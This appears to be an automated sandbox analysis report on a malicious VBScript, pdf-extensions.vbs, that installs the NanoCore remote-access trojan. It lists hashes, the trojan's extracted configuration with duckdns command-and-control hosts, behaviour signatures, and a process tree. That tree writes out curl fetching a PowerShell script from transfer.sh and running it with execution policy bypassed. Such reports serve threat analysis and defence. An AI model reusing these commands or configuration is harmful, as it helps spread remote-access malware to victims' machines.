Overview
overview
10Static
static
1$RECYCLE.B...GOK.js
windows7-x64
10$RECYCLE.B...GOK.js
windows10-2004-x64
10$RECYCLE.B...KV.scr
windows7-x64
1$RECYCLE.B...KV.scr
windows10-2004-x64
1$RECYCLE.B...XJ.exe
windows7-x64
3$RECYCLE.B...XJ.exe
windows10-2004-x64
3$RECYCLE.B...6RL.js
windows7-x64
10$RECYCLE.B...6RL.js
windows10-2004-x64
10$RECYCLE.B...IB.exe
windows7-x64
1$RECYCLE.B...IB.exe
windows10-2004-x64
1$RECYCLE.B...S1.bat
windows7-x64
7$RECYCLE.B...S1.bat
windows10-2004-x64
7pdf-extensions.vbs
windows7-x64
3pdf-extensions.vbs
windows10-2004-x64
10Analysis
-
max time kernel
208s -
max time network
208s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
31-03-2023 16:01
Static task
static1
Behavioral task
behavioral1
Sample
$RECYCLE.BIN/$R5K4GOK.js
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
$RECYCLE.BIN/$R5K4GOK.js
Resource
win10v2004-20230220-en
Behavioral task
behavioral3
Sample
$RECYCLE.BIN/$R7M8AKV.scr
Resource
win7-20230220-en
Behavioral task
behavioral4
Sample
$RECYCLE.BIN/$R7M8AKV.scr
Resource
win10v2004-20230220-en
Behavioral task
behavioral5
Sample
$RECYCLE.BIN/$RC3SQXJ.exe
Resource
win7-20230220-en
Behavioral task
behavioral6
Sample
$RECYCLE.BIN/$RC3SQXJ.exe
Resource
win10v2004-20230220-en
Behavioral task
behavioral7
Sample
$RECYCLE.BIN/$RCMX6RL.js
Resource
win7-20230220-en
Behavioral task
behavioral8
Sample
$RECYCLE.BIN/$RCMX6RL.js
Resource
win10v2004-20230220-en
Behavioral task
behavioral9
Sample
$RECYCLE.BIN/$RHL25IB.exe
Resource
win7-20230220-en
Behavioral task
behavioral10
Sample
$RECYCLE.BIN/$RHL25IB.exe
Resource
win10v2004-20230220-en
Behavioral task
behavioral11
Sample
$RECYCLE.BIN/$RJXIQS1.bat
Resource
win7-20230220-en
Behavioral task
behavioral12
Sample
$RECYCLE.BIN/$RJXIQS1.bat
Resource
win10v2004-20230220-en
Behavioral task
behavioral13
Sample
pdf-extensions.vbs
Resource
win7-20230220-en
General
-
Target
pdf-extensions.vbs
-
Size
111KB
-
MD5
3fa09c9c6deff87d8c7d42b352ce52b6
-
SHA1
c69283b1d90cd7fbec45521149292956ca4c6a1f
-
SHA256
4b18539613e1c78a58734ef5e60fe4793ca83384930a4172dbe7a008b14fec31
-
SHA512
90696b88151fe173fd2bf64c049b6f7f30493d4daf033f36b9f67f8c94f8b75047df1e7129a119d93bfeafb35007a6341bc745dfac78f817f070c2f9ca44f40e
-
SSDEEP
12:O+h3awpefBNRxkj5H6NPnqkc+h3awpeZ9nF6NPnJo:O+9xYZNRxo5wqh+9xYZlym
Malware Config
Extracted
nanocore
1.2.2.0
wordz54.duckdns.org:8687
rt54.duckdns.org:8687
f631006b-8446-49fb-86fd-51078e24df70
-
activate_away_mode
false
-
backup_connection_host
rt54.duckdns.org
-
backup_dns_server
8.8.4.4
-
buffer_size
65535
-
build_time
2022-08-11T20:00:42.860060236Z
-
bypass_user_account_control
true
- bypass_user_account_control_data
-
clear_access_control
true
-
clear_zone_identifier
false
-
connect_delay
4000
-
connection_port
8687
-
default_group
secure
-
enable_debug_mode
true
-
gc_threshold
1.048576e+07
-
keep_alive_timeout
30000
-
keyboard_logging
false
-
lan_timeout
2500
-
max_packet_size
1.048576e+07
-
mutex
f631006b-8446-49fb-86fd-51078e24df70
-
mutex_timeout
5000
-
prevent_system_sleep
false
-
primary_connection_host
wordz54.duckdns.org
-
primary_dns_server
8.8.8.8
-
request_elevation
true
-
restart_delay
5000
-
run_delay
0
-
run_on_startup
false
-
set_critical_process
true
-
timeout_interval
5000
-
use_custom_dns_server
false
-
version
1.2.2.0
-
wan_timeout
8000
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation WScript.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1752 set thread context of 4144 1752 powershell.exe 92 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1752 powershell.exe 1752 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1752 powershell.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 4532 wrote to memory of 3476 4532 WScript.exe 84 PID 4532 wrote to memory of 3476 4532 WScript.exe 84 PID 3476 wrote to memory of 216 3476 cmd.exe 86 PID 3476 wrote to memory of 216 3476 cmd.exe 86 PID 216 wrote to memory of 116 216 cmd.exe 87 PID 216 wrote to memory of 116 216 cmd.exe 87 PID 4532 wrote to memory of 5084 4532 WScript.exe 88 PID 4532 wrote to memory of 5084 4532 WScript.exe 88 PID 5084 wrote to memory of 2712 5084 cmd.exe 90 PID 5084 wrote to memory of 2712 5084 cmd.exe 90 PID 2712 wrote to memory of 1752 2712 cmd.exe 91 PID 2712 wrote to memory of 1752 2712 cmd.exe 91 PID 1752 wrote to memory of 4144 1752 powershell.exe 92 PID 1752 wrote to memory of 4144 1752 powershell.exe 92 PID 1752 wrote to memory of 4144 1752 powershell.exe 92 PID 1752 wrote to memory of 4144 1752 powershell.exe 92 PID 1752 wrote to memory of 4144 1752 powershell.exe 92 PID 1752 wrote to memory of 4144 1752 powershell.exe 92 PID 1752 wrote to memory of 4144 1752 powershell.exe 92 PID 1752 wrote to memory of 4144 1752 powershell.exe 92
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\pdf-extensions.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4532 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://transfer.sh/get/3DdLPT/coca.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps12⤵
- Suspicious use of WriteProcessMemory
PID:3476 -
C:\Windows\system32\cmd.execmd.exe /c curl https://transfer.sh/get/3DdLPT/coca.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps13⤵
- Suspicious use of WriteProcessMemory
PID:216 -
C:\Windows\system32\curl.execurl https://transfer.sh/get/3DdLPT/coca.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps14⤵PID:116
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps12⤵
- Suspicious use of WriteProcessMemory
PID:5084 -
C:\Windows\system32\cmd.execmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps13⤵
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps14⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1752 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵PID:4144
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3.8MB
MD591ab47adf548d6c313455352867cab03
SHA11803cbc5660ca38a5af4dde9eee28ee0fa268a1f
SHA256e81475bf470676b14f4fd0016fc3a4f71501acd764d43c7caf70d7758aafa8ce
SHA5128e1da40ccb3f960c26f32f6ca7d9747977ccc39521cf4426fbc33b266ebb54c27228c54c665df503bbc9a104b3f5939b355e2f5664c08b991f725a04d4b1753a